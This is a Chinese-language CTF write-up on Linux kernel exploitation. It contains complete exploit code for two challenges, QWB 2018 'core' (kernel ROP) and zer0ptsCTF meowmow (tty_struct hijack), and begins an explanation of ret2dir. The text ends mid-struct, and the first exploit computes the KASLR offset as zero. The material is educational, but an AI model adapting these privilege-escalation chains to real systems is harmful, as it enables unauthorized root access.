Linux-Kernel-0x02-Practice

一 、Kernel ROP

其大致思想类似于userland部分的ROP,唯一区别就是咱们需要注意现场的保存与还原即可:)

例题:强网杯2018 - core

0. 反编译代码分析

文件里面包含了这几个文件
bzImage,core.cpio,start.sh,vmlinux
先看看start.sh

1
2
3
4
5
6
7
8
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \

可以看到咱们这儿题目采用了kaslr ,有地址随机,所以咱们需要泄露地址,大致思路和用户态一致。这里还注意那就是从ctfwiki上面下载下来的题目是-m 64M,这里会出现运行不了虚拟机的情况,所以咱们改为128M即可,这是内存大小的定义,太小了跑不动。

之后咱们再看看文件系统解压后得到的init脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mv exp.c /
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko
#setsid /bin/cttyhack setuidgid 0 /bin/sh

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0 -f

从中我们可以看到文件系统中insmod了一个core.ko,一般来讲这就是漏洞函数了,还有咱们可以添加setsid /bin/cttyhack setuidgid 0 /bin/sh这一句来使得我们进入虚拟机的时候就是root权限,大伙不必惊慌,这里是因为咱们是再本地需要进行调试,所以init脚本任我们改,start脚本也是,咱们可以直接把kalsr关了也行,但关了并不代表咱们不管,咱们这一举动主要是为了方便调试的,最终打远程还是人家说了算,咱们值有一个exp能提交。
接着分析init,这里还发现开始时内核符号表被复制了一份到/tmp/kalsyms中,利用这个我们可以获得内核中所有函数的地址,还有个恶心的地方那就是这里开启了定时关机,咱们可以把这给先注释掉
poweroff -d 120 -f &

进入漏洞模块的分析

这里可以看到有canary和NX,所以咱们通过ROP的话需要进行canary泄露。
接下来咱们分析相关函数init_moddule

可以看到模块加载的初期会创建一个名为core的进程,在虚拟机中在/proc目录下
在看看比较重要的ioctl函数

可以看出有三个模式选择,分别点入相关函数看

这里的read函数就是向用户指定的地址从off偏移地址写入64个字节.
而从ioctl中第二个case可以看到咱们居然可以设置off,所以我们可以通过设置偏移来写入canary的值,而我们从ida中可以看到咱们的canary是位于这里

可以知道相差对于v5相差0x40,所以咱们设置的off也是0x40

我们还可以来看看file_operations,(不秦楚的大伙可以看看我的上一篇环境搭建的文章),可以看到他只实现了write,ioctl,release的系统调用:

我们再来看看其他函数,先看core_write


这里可以知道他总共可以向name这个地址写入0x800个字节,心动
我们再来看看ioctl中第三个选项的core_copy_func


发现他可以从name上面拷贝数据到达栈上,然后这个判断存在着整形溢出,这里如果咱传个负数就可以达成效果了。

既然咱们可以在栈上做手脚,那么我们就可以利用ROP的方式了,首先找几个gadget,这里的gadget是需要在vmlinux中寻找,我的推荐是用

objdump -d ./vmlinux > ropgadget \
cat ropgadget | grep "pop rdi; ret"

这样的类型进行寻找

1.寻找gadget

如图:
对于上面所说的比较关键的两个函数commit_creds以及prepare_kernel_cred,我们在vmlinux中去寻找他所加载的的地址
然后我们可以看看ropgadget文件

从中咱们可以看到其中即我们所需要的gadget(实际上就是linux内核镜像所使用的汇编代码),此时我们再通过linux自带的grep进行搜索,个人认为还是比较好用的,用ropgadget或者是ropper来说都可以,看各位师傅的喜好来.具体使用情况如下:

以此手法获得两个主要函数的地址后,此刻若咱们在exp中获得这两个函数的实际地址,然后将两者相减即可得到KASLR的偏移地址。
自此咱们继续搜索别的gadget,我们此刻需要的gadget共有如下几个:

swapgs; popfq;  ret;
mov rdi, rax;  call rdx; 
pop rdx; ret;  
pop rdi; ret;   
pop rcx; ret; 
iretq

师傅们可以用上述方法自行寻找.

2. 自行构造返回状态

虽然咱们的提权是在内核态当中,但我们最终还是需要返回用户态来得到一个root权限的shell,所以当我们进行栈溢出rop之后还需要利用swapgs等保存在内核栈上的寄存器值返回到应得的位置,但是如何保证返回的时候不出错呢,对,那就只能在调用内核态的时候将即将保存的正确的寄存器值先保存在咱们自己申请的值里面,这样就方便咱们在rop链结尾填入他们实现返回不报错。既然涉及到了保存值,那我们就需要内嵌汇编代码来实现此功能,代码如下,这也可以视为一个通用代码;

size_t user_cs, user_ss,user_rflags,user_sp;

//int fd = 0;        // file pointer of process 'core'

void saveStatus(){
  __asm__("mov user_cs, cs;"
          "mov user_ss, ss;"
          "mov user_sp, rsp;"
          "pushf;"
          "pop user_rflags;"
          );
  puts("\033[34m\033[1m Status has been saved . \033[0m");
}

大伙学到了内核pwn,那汇编功底自然不必说,我就不解释这段代码功能了。

3. 攻击思路

现在开始咱们的攻击思路思考,在上面介绍各个函数的时候我也稍微讲了点。我们所做的事主要如下:

  1. 利用ioctl中的选项2.修改off为0x40

  2. 利用core_read,也就是ioctl中的选项1,可将局部变量v5的off偏移地址打印,经过调试可发现这里即为canary

  3. 当咱们打印了canary,现在即可进行栈溢出攻击了,但是溢出哪个栈呢,我们发现ioctl的第三个选项中调用的函数 core_copy_func,会将bss段上的name输入在栈上,输入的字节数取决于咱们传入的数字,并且此时他又整型溢出漏洞,好,就决定冤大头是他了

  4. core.ko 所实现的系统调用write可以发现其中可以将我们传入的值写到bss段中的name上面,天助我也,所以咱们就可以在上面适当的构造rop链进行栈溢出了

大伙看到这里是不是觉得有点奇怪,欸,刚才不是说要泄露地址码,这兄弟是不是讲错了,就这?大家不要慌,我这正要讲解,从上面的init脚本中我们可以看到这一句:

1
cat /proc/kallsyms > /tmp/kallsyms

其中 /proc/kallsyms中包含了内核中所有用到的符号表,而处于用户态的我们是不能访问的,所以出题人贴心的将他输出到了/tmp/kallsyms中,这就使得我们在用户态也依然可以访问了,所以我们还得在exp中写一个文件遍历的功能,当然这对于学过系统编程的同学并不在话下,(可是我上这课在划水….)
这里贴出代码给大伙先看看

void get_function_address(){
        FILE* sym_table = fopen("/tmp/kallsyms", "r");        // including all address of kernel functions,just like the user model running address.
        if(sym_table == NULL){
                printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m");
                exit(1);
        }
        size_t addr = 0;
        char type[0x10];
        char func_name[0x50];
        // when the reading raises error, the function fscanf will return a zero, so that we know the file comes to its end.
        while(fscanf(sym_table, "%llx%s%s", &addr, type, func_name)){
                if(commit_creds && prepare_kernel_cred)                // two addresses of key functions are all found, return directly.
                        return;
                if(!strcmp(func_name, "commit_creds")){                // function "commit_creds" found
                        commit_creds = addr;
                        printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#llx\n", commit_creds);
                }else if(!strcmp(func_name, "prepare_kernel_cred")){
                        prepare_kernel_cred = addr;
                        printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#llx\n", prepare_kernel_cred);
                }
        }

}

当知道exp思路之后,其他的一切就简单起来,只需要看懂他然后实现即可.

4. gdb调试qemu中内核基本方法

众所周知,调试在pwn中是十分重要的,特别是动调,所以这里介绍下gdb调试内核的方法
由于咱们的内核是跑在qemu中,所以我们gdb需要用到远程调试的方法,但是如果直接连端口的话会出现没符号表不方便调试的,所以我们需要自行导入内核模块,也就是文件提供的vmlinux,之后由于咱们还需要core.ko的符号表,所以咱们也可以通过自行导入来获得可以,通过 add-symbol-file core.ko textaddr 加载 ,而这里的textaddr即为core.ko.text段地址,我们可以通过修改init中为root权限进行设置.
这里.text 段的地址可以通过 /sys/modules/core/section/.text 来查看,
这里强烈建议大伙先关kaslr(通过在启动脚本修改,就是将kaslr改为nokaslr)再进行调试,效果图如下


我们可以通过-gdb tcp:port或者 -s 来开启调试端口,start.sh 中已经有了 -s,不必再自己设置。(对了如果-s ,他的功能等同于-gdb tcp:1234)
在我们获得.text基地址后记得用脚本来开gdb,不然每次都要输入这么些个东西太麻烦了,脚本如下十分简单:

#!/bin/bash
gdb -q \
  -ex "" \
  -ex "file ./vmlinux" \
  -ex "add-symbol-file ./extract/core.ko 0xffffffffc0000000" \
  -ex "b core_copy_func" \
  -ex "target remote localhost:1234" \

其中打断点可以先打在core_read,这里打在core_copy_func是我调到尾声修改的.这里还注意一个点,就是当采用pwndbg的时侯需要root权限才可以进行调试不然会出现以下错误


最开始气死我了,人家peda都不要root,但是最开始不清楚为什么会错,我还以为是版本问题,但想到这是我最近刚配的一台机子又应该不是,其实最开始看到permission就该想到的,害.
我们用root权限进行开调

aa
可以看到十分的成功,此刻我continue,还记得咱们下的断电码,b core_read,如果咱们调用它后咱们就会在这里停下来,此刻我们运行咱们的程序试试


这样咱们就可以愉快的进行调试啦,至此gdb调试内核基本方法到此结束~~~

5. ROP链解析

这里简单讲讲,直接给图


相信大家理解起来不费力.

6. exp

本次exp如下,大伙看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/ioctl.h>

size_t commit_creds = NULL, prepare_kernel_cred = NULL; // address of to key function
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RDI_RET 0xffffffff81000b2f
#define POP_RCX_RET 0xffffffff81021e53
#define IRETQ 0xffffffff81050ac2
size_t user_cs, user_ss,user_rflags,user_sp;

//int fd = 0; // file pointer of process 'core'

/*void saveStatus();
void get_function_address();
#void core_read(int fd, char* buf);
void change_off(int fd, long long off);
void core_copy_func(int fd, long long nbytes);
void print_binary(char* buf, int length);
void shell();
*/
void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m Status has been saved . \033[0m");
}

void core_read(int fd, char *addr){
printf("try read\n");
ioctl(fd,0x6677889B,addr);
printf("read done!");
}

void change_off(int fd, long long off){
printf("try set off \n");
ioctl(fd,0x6677889C,off);
}

void core_copy_func(int fd, long long nbytes){
puts("try cp\n");
ioctl(fd,0x6677889A,nbytes);
}

void get_function_address(){
FILE* sym_table = fopen("/tmp/kallsyms", "r"); // including all address of kernel functions,just like the user model running address.
if(sym_table == NULL){
printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m");
exit(1);
}
size_t addr = 0;
char type[0x10];
char func_name[0x50];
// when the reading raises error, the function fscanf will return a zero, so that we know the file comes to its end.
while(fscanf(sym_table, "%llx%s%s", &addr, type, func_name)){
if(commit_creds && prepare_kernel_cred) // two addresses of key functions are all found, return directly.
return;
if(!strcmp(func_name, "commit_creds")){ // function "commit_creds" found
commit_creds = addr;
printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#llx\n", commit_creds);
}else if(!strcmp(func_name, "prepare_kernel_cred")){
prepare_kernel_cred = addr;
printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#llx\n", prepare_kernel_cred);
}
}
}



void shell(){
if(getuid()){
printf("\033[31m\033[1m[x] Error: Failed to get root, exiting......\n\033[0m");
exit(1);
​ }
printf("\033[32m\033[1m[+] Getting the root......\033[0m\n");
​ system("/bin/sh");
exit(0);
​ }

int main(){
​ saveStatus();
int fd = open("/proc/core",2); //get the process fd
if(!fd){
printf("\033[31m\033[1m[x] Error: Cannot open process \"core\"\n\033[0m");
exit(1);
​ }
char buffer[0x100] = {0};
​ get_function_address(); // get addresses of two key function
ssize_t vmlinux = commit_creds - commit_creds; //base address
printf("vmlinux_base = %x",vmlinux);
//get canary
size_t canary;
​ change_off(fd,0x40);
//getchar();

​ core_read(fd,buffer);
​ canary = ((size_t *)buffer)[0];
printf("canary ==> %p\n",canary);
//build the ROP
size_t rop_chain[0x1000] ,i= 0;
printf("construct the chain\n");
for(i=0; i< 10 ;i++){
​ rop_chain[i] = canary;
​ }
​ rop_chain[i++] = POP_RDI_RET + vmlinux ;
​ rop_chain[i++] = 0;
​ rop_chain[i++] = prepare_kernel_cred ; //prepare_kernel_cred(0)
​ rop_chain[i++] = POP_RDX_RET + vmlinux;
​ rop_chain[i++] = POP_RCX_RET + vmlinux;
​ rop_chain[i++] = MOV_RDI_RAX_CALL_RDX + vmlinux;
​ rop_chain[i++] = commit_creds ;
​ rop_chain[i++] = SWAPGS_POPFQ_RET + vmlinux;
​ rop_chain[i++] = 0;
​ rop_chain[i++] = IRETQ + vmlinux;
​ rop_chain[i++] = (size_t)shell;
​ rop_chain[i++] = user_cs;
​ rop_chain[i++] = user_rflags;
​ rop_chain[i++] = user_sp;
​ rop_chain[i++] = user_ss;
​ write(fd,rop_chain,0x800);
​ core_copy_func(fd,0xffffffffffff0100);
​ }



7. 编译运行

这里哟个小知识,那就是在被攻击的内核中一般不会给你库函数,所以咱们需要用gcc中的-static参数进行静态链接,然后就是为了支持内嵌汇编代码,所以我们需要使用-masm=intel,这里intel也可以换amd,看各位汇编语言用的啥来进行修改.我这里用的把保存状态代码是intel支持的.

gcc test.c -o test -static -masm=intel -g

将此编译得到的二进制文件打包近文件系统然后重新启动,情况如图

成功提权!!!!!

例题:2020-zer0ptsCTF-meowmow

题目中一些寻常的结构体都开了,经过调试发现内核并没有开启以下选项

CONFIG_SLAB_FREELIST_RANDOM=n
CONFIG_SLAB_FREELIST_HARDENED=n

而题目当中存在很明显的越界读写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static ssize_t mod_read(struct file *filp, char __user *buf, size_t count, loff_t *f_pos)
{
if (filp->f_pos < 0 || filp->f_pos >= MAX_SIZE) return 0;
if (count < 0) return 0;
if (count > MAX_SIZE) count = MAX_SIZE - *f_pos;
if (copy_to_user(buf, &memo[filp->f_pos], count)) return -EFAULT;
*f_pos += count;
return count;
}

static ssize_t mod_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos)
{
if (filp->f_pos < 0 || filp->f_pos >= MAX_SIZE) return 0;
if (count < 0) return 0;
if (count > MAX_SIZE) count = MAX_SIZE - *f_pos;
if (copy_from_user(&memo[filp->f_pos], buf, count)) return -EFAULT;
*f_pos += count;
return count;
}

static loff_t mod_llseek(struct file *filp, loff_t offset, int whence)
{
loff_t newpos;
switch(whence) {
case SEEK_SET:
newpos = offset;
break;
case SEEK_CUR:
newpos = filp->f_pos + offset;
break;
case SEEK_END:
newpos = strlen(memo) + offset;
break;
default:
return -EINVAL;
}
if (newpos < 0) return -EINVAL;
filp->f_pos = newpos;
return newpos;
}

因此我们可以很轻松的泄露出堆地址,然后也可以知道自己本身分配堆块的地址,因为freelist是按照顺序来的

而由于该漏洞模块会从 kmalloc-1k开始分配堆块,所以我们尝试使用 tty_struct进行利用,然后泄露出他结构体当中的内核基地址,之后我们正常劫持他的ops字段即可稳定提权

这里 mov rdi, rax确实不好找,最终是在 convert_to_art_dsc该函数中找到了合适的gadget :^)

效果如下:

下面就是本次的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/fs.h>


#define MAX_SIZE 0x400 //1k,nice
#define TTY_SPRAY_NR 16
#define PTM_UNIX98_OPS 0xffffffff81e65900
#define POP_RDI_RET 0xffffffff81001268
#define LEAVE_RET 0xffffffff81008ae7
#define ADD_RSP_0X28_RET 0xffffffff810db617
#define PREPARE_KERNEL_CRED 0xffffffff8107bb50
#define COMMIT_CREDS 0xffffffff8107b8b0
#define PUSH_RAX_RET 0xffffffff81022353
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE 0xFFFFFFFF81A00A45
#define POP_RDX_RET 0xffffffff81043137
#define MOV_RDI_RAX_RET 0xffffffff81021f38
/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void debug(){
puts("[!]Debug here!");
getchar();
}
/*
* save the process current context
* */
size_t user_cs, user_ss,user_rflags,user_sp;

void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m Status has been saved . \033[0m");
}



#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
printf("\033[0m\033[32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}

void get_rootshell(){
if(getuid()){
error_log("Priviledge elevation failed!");
}
system("/bin/sh");
exit(0);
}
int dev_fd;
int tty_fd;
size_t memo_chunk_addr;
size_t kernel_offset;
size_t fake_tty_ops;
size_t *rop;

void main(void){
int index = 0;
char buf[0x400];
saveStatus();
puts("[*]Leaking the kernel heap addr...");
dev_fd = open("/dev/memo", O_RDWR);
if(dev_fd < 0){
error_log("Allocate memo failed...");
}
if(lseek(dev_fd, 0x300, SEEK_CUR) < 0){
error_log("lseek failed!");
}
if(read(dev_fd, buf, 0x400) < 0){
error_log("read failed!");
}

memo_chunk_addr =*(size_t *)&buf[0x100] - 0x800;
PRINT_ADDR("memo_chunk_addr", memo_chunk_addr);

info_log("[*]Leaking the kernel_base...");
tty_fd = open("/dev/ptmx", O_RDWR);

memset(buf, 'A', 0x400);
if(lseek(dev_fd, 0x300, SEEK_SET) < 0){
error_log("lseek failed!");
}
if(read(dev_fd, buf, 0x400) < 0){
error_log("read failed!");
}

kernel_offset = *(size_t *)&buf[0x118] - PTM_UNIX98_OPS;
PRINT_ADDR("kernel_offset", kernel_offset);

if(lseek(dev_fd, 0, SEEK_SET) < 0){
error_log("lseek failed");
}

if(lseek(dev_fd, 0x300, SEEK_SET) < 0){
error_log("lseek)failed");
}

fake_tty_ops = memo_chunk_addr + 0x300;
*(size_t *)&(buf[0x118]) = fake_tty_ops;
*(size_t *)&(buf[0x60]) = LEAVE_RET + kernel_offset;
*(size_t *)&(buf[0x108]) = ADD_RSP_0X28_RET + kernel_offset;

rop = (size_t *)&(buf[0x138]);
rop[index++] = POP_RDI_RET + kernel_offset;
rop[index++] = 0;
rop[index++] = PREPARE_KERNEL_CRED + kernel_offset;
rop[index++] = MOV_RDI_RAX_RET + kernel_offset;
rop[index++] = COMMIT_CREDS + kernel_offset;
rop[index++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE + kernel_offset;
rop[index++] = 0xdeadbeef;
rop[index++] = 0xdeadbeef;
rop[index++] = (size_t)get_rootshell;
rop[index++] = user_cs;
rop[index++] = user_rflags;
rop[index++] = user_sp+8;
rop[index++] = user_ss;



write(dev_fd, buf, sizeof(buf));
ioctl(tty_fd, 0, 0);
}

二、Kernel ret2dir

0.ret2dir原理

ret2dir的存在是为了解决SMAP/SMEP保护模式的一种手法,该保护模式是阻止了内核程序执行用户程序,第一次被提出是在14年的一篇论文,这里页给出链接

ret2dir原论文
首先我们得知道一下Linux内存中的基本布局,链接如下,有兴趣的同学可以自行观看

Linux 内存布局

我们可以看到有以下一个区域

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
========================================================================================================================
Start addr | Offset | End addr | Size | VM area description
========================================================================================================================
| | | |
0000000000000000 | 0 | 00007fffffffffff | 128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
| | | |
0000800000000000 | +128 TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
| | | | virtual memory addresses up to the -128 TB
| | | | starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
|
| Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
| | | |
ffff800000000000 | -128 TB | ffff87ffffffffff | 8 TB | ... guard hole, also reserved for hypervisor
ffff880000000000 | -120 TB | ffff887fffffffff | 0.5 TB | LDT remap for PTI
ffff888000000000 | -119.5 TB | ffffc87fffffffff | 64 TB | direct mapping of all physical memory (page_offset_base)
ffffc88000000000 | -55.5 TB | ffffc8ffffffffff | 0.5 TB | ... unused hole
ffffc90000000000 | -55 TB | ffffe8ffffffffff | 32 TB | vmalloc/ioremap space (vmalloc_base)
ffffe90000000000 | -23 TB | ffffe9ffffffffff | 1 TB | ... unused hole
ffffea0000000000 | -22 TB | ffffeaffffffffff | 1 TB | virtual memory map (vmemmap_base)
ffffeb0000000000 | -21 TB | ffffebffffffffff | 1 TB | ... unused hole
ffffec0000000000 | -20 TB | fffffbffffffffff | 16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
|
| Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
| | | |
fffffc0000000000 | -4 TB | fffffdffffffffff | 2 TB | ... unused hole
| | | | vaddr_end for KASLR
fffffe0000000000 | -2 TB | fffffe7fffffffff | 0.5 TB | cpu_entry_area mapping
fffffe8000000000 | -1.5 TB | fffffeffffffffff | 0.5 TB | ... unused hole
ffffff0000000000 | -1 TB | ffffff7fffffffff | 0.5 TB | %esp fixup stacks
ffffff8000000000 | -512 GB | ffffffeeffffffff | 444 GB | ... unused hole
ffffffef00000000 | -68 GB | fffffffeffffffff | 64 GB | EFI region mapping space
ffffffff00000000 | -4 GB | ffffffff7fffffff | 2 GB | ... unused hole
ffffffff80000000 | -2 GB | ffffffff9fffffff | 512 MB | kernel text mapping, mapped to physical address 0
ffffffff80000000 |-2048 MB | | |
ffffffffa0000000 |-1536 MB | fffffffffeffffff | 1520 MB | module mapping space
ffffffffff000000 | -16 MB | | |
FIXADDR_START | ~-11 MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
ffffffffff600000 | -10 MB | ffffffffff600fff | 4 kB | legacy vsyscall ABI
ffffffffffe00000 | -2 MB | ffffffffffffffff | 2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________


====================================================
Complete virtual memory map with 5-level page tables
====================================================

我们可以看到这一行

 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)

这里我们通过后面的内存段解释可以知道,他是映射了整个物理地址
而这里还有个点就是,再Linux内核当中,分配内存通常有以下两种方式:

  1. vmalloc, 这里按照页为单位分配,需要虚拟地址连续,物理地址不需要连续
  2. kmalloc, 这里按照字节为单位分配,虚拟地址和物理地址都需要连续

而我们通常采用kmalloc进行分配。
因此,此时的内存就存在以下的情况

在早期,我们的physmap是可执行的,所以我们可以在用户态编写好shellcode,然后在内核态劫持程序流到此就可以实现我们想得到的操作,但是目前的话我们的physmap一般都设置为不可执行,因此我们就无法通过shellcode的方式,但是我们仍然可以通过ROP来得到我们想要的结果
所以我们目前的利用手法就是如下:

  1. 在用户态使用mmap来大量映射进行堆喷,这里咱们申请的越多,我们在物理内存当中使用的地址就会越大,而后我们在内核态也能更快的得到我们所期待的重合段
  2. 然后我们在内核态利用漏洞获得堆上的地址,也就是kmalloc后获取到的slab的地址,然后计算出physmap的地址
  3. 利用ROP劫持执行流到physmap上面

通过上面的手法,我们就可以避开传统的内核访问用户但是被隔绝的情况,此时我们相当于是直接操作物理内存

1.例题MINI-LCTF-2022 Kgadget

[md]这里我就奉行拿来主义,给出arttnba3师傅出的题,如有冒犯立马删(胆小

ret2dir例题

拿到题第一步,首先咱们解压了看看

 tar -Jxf kgadget.tar.xzf

这个XZ文件有两种解压方式,还有一种就是先解压成tar,再解压tar
然后我们获取到文件系统后先来看看init脚本

  1 #!/bin/sh
  2 chown -R 0:0 /
  3 mount -t tmpfs tmpfs /tmp
  4 mount -t proc none /proc
  5 mount -t sysfs none /sys
  6 mount -t devtmpfs devtmpfs /dev
  7 
  8 echo 1 > /proc/sys/kernel/dmesg_restrict
  9 echo 1 > /proc/sys/kernel/kptr_restrict
 10 
 11 chown 0:0 /flag
 12 chmod 400 /flag
 13 chmod 777 /tmp
 14 
 15 insmod kgadget.ko
 16 chmod 777 /dev/kgadget
 17 
 18 cat /root/banner
 19 echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
 20 setsid cttyhack setuidgid 1000 sh                                                                                                                                                                                                
 21 poweroff -d 0 -f

2.IDA逆向

可以看到其中insmod了一个kgadget.ko,这儿也是咱们的漏洞模块,首先我们使用checksec来查看一下该模块

然后我们拖入IDA进行静态分析,首先就是ioctl函数

可以看到这里咱们其实编译会出点问题,所以我们到汇编这里查看

.text.unlikely:000000000000011C 48 8B 1A                      mov     rbx, [param]                    ; 我们传递的函数param
.text.unlikely:000000000000011F                               kgadget_ptr = rbx                       ; void (*)(void)
.text.unlikely:000000000000011F 48 C7 C7 70 03 00 00          mov     __file, offset unk_370
.text.unlikely:0000000000000126 48 89 DE                      mov     cmd, kgadget_ptr
.text.unlikely:0000000000000129 E8 2A 0F 00 00                call    printk                          ; PIC mode
.text.unlikely:0000000000000129
.text.unlikely:000000000000012E 48 C7 C7 A0 03 00 00          mov     rdi, offset unk_3A0
.text.unlikely:0000000000000135 E8 1E 0F 00 00                call    printk                          ; PIC mode
.text.unlikely:0000000000000135
.text.unlikely:000000000000013A 48 89 65 E8                   mov     [rbp-18h], rsp
.text.unlikely:000000000000013E 48 8B 45 E8                   mov     rax, [rbp-18h]
.text.unlikely:0000000000000142 48 C7 C7 F8 03 00 00          mov     rdi, offset byte_3F8
.text.unlikely:0000000000000149 48 05 00 10 00 00             add     rax, 1000h
.text.unlikely:000000000000014F 48 25 00 F0 FF FF             and     rax, 0FFFFFFFFFFFFF000h         ; rax此时为内核栈的栈底,也就是最高处
.text.unlikely:0000000000000155 48 8D 90 58 FF FF FF          lea     rdx, [rax-0A8h]                 ; 此时将距离栈底0xA8的位置传入rdx,该rdx所在的地址将会作为一个中断栈,保存中断的寄存器值
.text.unlikely:000000000000015C 48 89 55 E8                   mov     [rbp-18h], rdx
.text.unlikely:0000000000000160                               regs = rdx                              ; pt_regs *
.text.unlikely:0000000000000160 48 BA 61 72 74 74 6E 62 61 33 mov     regs, 3361626E74747261h         ; 无效值
.text.unlikely:000000000000016A 48 89 90 58 FF FF FF          mov     [rax-0A8h], rdx                 ; r15
.text.unlikely:0000000000000171 48 89 90 60 FF FF FF          mov     [rax-0A0h], rdx                 ; r14
.text.unlikely:0000000000000178 48 89 90 68 FF FF FF          mov     [rax-98h], rdx                  ; r13
.text.unlikely:000000000000017F 48 89 90 70 FF FF FF          mov     [rax-90h], rdx                  ; r12
.text.unlikely:0000000000000186 48 89 90 78 FF FF FF          mov     [rax-88h], rdx                  ; rbp
.text.unlikely:000000000000018D 48 89 50 80                   mov     [rax-80h], rdx                  ; rbx
.text.unlikely:0000000000000191 48 89 50 90                   mov     [rax-70h], rdx                  ; r10
.text.unlikely:0000000000000195 E8 BE 0E 00 00                call    printk                          ; PIC mode
.text.unlikely:0000000000000195
.text.unlikely:000000000000019A E8 B1 0E 00 00                call    __x86_indirect_thunk_rbx        ; PIC mode

可以看到一个pt_regs 结构体,我们在这里查看一下这个结构体的含义

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
        unsigned long r15;
        unsigned long r14;
        unsigned long r13;
        unsigned long r12;
        unsigned long rbp;
        unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
        unsigned long r11;
        unsigned long r10;
        unsigned long r9;
        unsigned long r8;
        unsigned long rax;
        unsigned long rcx;
        unsigned long rdx;
        unsigned long rsi;
        unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
